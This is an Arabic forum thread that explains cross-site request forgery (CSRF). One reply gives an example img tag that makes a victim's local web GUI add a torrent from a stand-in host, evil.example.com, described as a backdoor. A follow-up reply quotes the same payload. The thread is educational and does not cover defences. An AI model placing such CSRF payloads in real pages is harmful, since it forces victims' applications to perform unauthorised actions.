اذهب إلى المحتوى
  • 0

من يشرح لنا بشكل مبسط ثغرة csrf مع اعطاء امثلة وايضا الطريقة المثلى لكيفية ترقيعها؟

Ahmed Dev

بواسطة Ahmed Dev

 مشاركة

السؤال

2 أجوبة على هذا السؤال

Recommended Posts

  • 0
هشام رزق الله عضو نشيط

هشام رزق الله

نشر
نشر

وهي اختصار لـ Cross-site request forgery وتدعى هذه الثغرة باللغة العربية بثغرة تزوير الطلب عبر المواقع، وهي عبارة عن تمرير أوامر غير مرخصة بها من المستخدم الذي يثق به الموقع إليه، ولقد اكتشفت هذه الثغرة سنة 2001.

مثال على هذه الثغرة: 

<img src="http://localhost:8080/gui/?action=add-url&s=http://evil.example.com/backdoor.torrent">

حيث أنه عند فتح هذه الصفحة سيتم فتح باب خلفي كما هو ظاهر حيث تم تمرير رابط خبيث إلى الصورة ولم يتم التأكد من محتويات وسم الصور.

رابط هذا التعليق
شارك على الشبكات الإجتماعية
  • 0
Salem_FITURI عضو مبتدئ

Salem_FITURI

نشر
نشر
بتاريخ On 15‏/2‏/2016 at 20:31 قال هشام رزق الله:

مثال على هذه الثغرة: 


<img src="http://localhost:8080/gui/?action=add-url&s=http://evil.example.com/backdoor.torrent">


حيث أنه عند فتح هذه الصفحة سيتم فتح باب خلفي كما هو ظاهر حيث تم تمرير رابط خبيث إلى الصورة ولم يتم التأكد من محتويات وسم الصور.

سمعت عن ثغرة شبيهة تخص الويندوز و بالتحديد متصفح IE حيث يتم تضمين كود جافاسكريب بذاخل ملف الصورة .

بالنسبة للمثال المرفق هل الرابط بشكله الحالي لازال يشكل خطر على المستدمين ام تم حل هذه الثغرة !

رابط هذا التعليق
شارك على الشبكات الإجتماعية

انضم إلى النقاش

يمكنك أن تنشر الآن وتسجل لاحقًا. إذا كان لديك حساب، فسجل الدخول الآن لتنشر باسم حسابك.

زائر
أجب على هذا السؤال...

×   لقد أضفت محتوى بخط أو تنسيق مختلف.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   جرى استعادة المحتوى السابق..   امسح المحرر

×   You cannot paste images directly. Upload or insert images from URL.

×
 مشاركة
اذهب إلى قائمة الأسئلة

  • إعلانات

  • تابعنا على



×
×
  • أضف...